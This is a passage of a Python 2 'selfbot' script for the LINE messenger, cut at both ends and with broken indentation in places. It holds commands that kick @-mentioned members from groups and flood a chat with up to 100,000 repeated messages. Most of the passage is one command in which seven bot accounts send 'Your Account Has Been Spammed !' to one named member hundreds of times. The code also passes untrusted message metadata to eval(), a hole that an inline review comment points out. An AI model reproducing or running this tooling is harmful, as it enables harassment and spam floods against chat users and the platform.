print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
# --- "Stafflist": list the display names of everyone in `staff` ---
elif msg.text in ["Stafflist","stafflist"]:
    if staff == []:
        cl.sendText(msg.to,"The stafflist is empty")
    else:
        cl.sendText(msg.to,"Staff list:")
        mc = ""
        for mi_d in staff:
            mc += "=>" +cl.getContact(mi_d).displayName + "\n"
        cl.sendText(msg.to,mc)
        print "[Command]Stafflist executed"
#-----------------------------------------------------------
# --- "Vk @...": kick every @-mentioned member via cl ---
elif ("Vk " in msg.text):
    targets = []
    # NOTE(review): eval() on message metadata -- unsafe on untrusted
    # input; json.loads would be the safe equivalent here.
    key = eval(msg.contentMetadata["MENTION"])
    key["MENTIONEES"][0]["M"]
    for x in key["MENTIONEES"]:
        targets.append(x["M"])
    for target in targets:
        try:
            cl.kickoutFromGroup(msg.to,[target])
        except:
            cl.sendText(msg.to,"Error")
# --- "Contact @...": show the mid of the first @-mentioned member ---
elif ("Contact " in msg.text):
    key = eval(msg.contentMetadata["MENTION"])
    key1 = key["MENTIONEES"][0]["M"]
    mi = cl.getContact(key1)
    cl.sendText(msg.to,"Mid:" + key1)
#----------------------------------------------------------------
# --- "InviteMeTo: <gid>" (admin only): ki invites the sender there ---
elif "InviteMeTo: " in msg.text:
    if msg.from_ in admin:
        gid = msg.text.replace("InviteMeTo: ","")
        if gid == "":
            cl.sendText(msg.to,"Invalid group id")
        else:
            try:
                ki.findAndAddContactsByMid(msg.from_)
                ki.inviteIntoGroup(gid,[msg.from_])
            except:
                ki.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
#-----------------------------------------------------------
# --- "Spam on|off <count> <text>": flood the chat.
# "on"  -> send <text> <count> times as separate messages
# "off" -> send one message containing <count> repeated lines
elif "Spam " in msg.text:
    txt = msg.text.split(" ")
    # NOTE(review): raises IndexError/ValueError if the count argument is
    # missing or non-numeric -- uncaught here.
    jmlh = int(txt[2])
    teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","")
    tulisan = jmlh * (teks+"\n")
    #Vicky Kull~
    if txt[1] == "on":
        if jmlh <= 100000:
            for x in range(jmlh):
                cl.sendText(msg.to, teks)
        else:
            cl.sendText(msg.to, "Out of Range!")
    elif txt[1] == "off":
        if jmlh <= 100000:
            cl.sendText(msg.to, tulisan)
        else:
            cl.sendText(msg.to, "Out Of Range!")
elif "Cek pm @" in msg.text:
_name = msg.text.replace("Cek pm @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
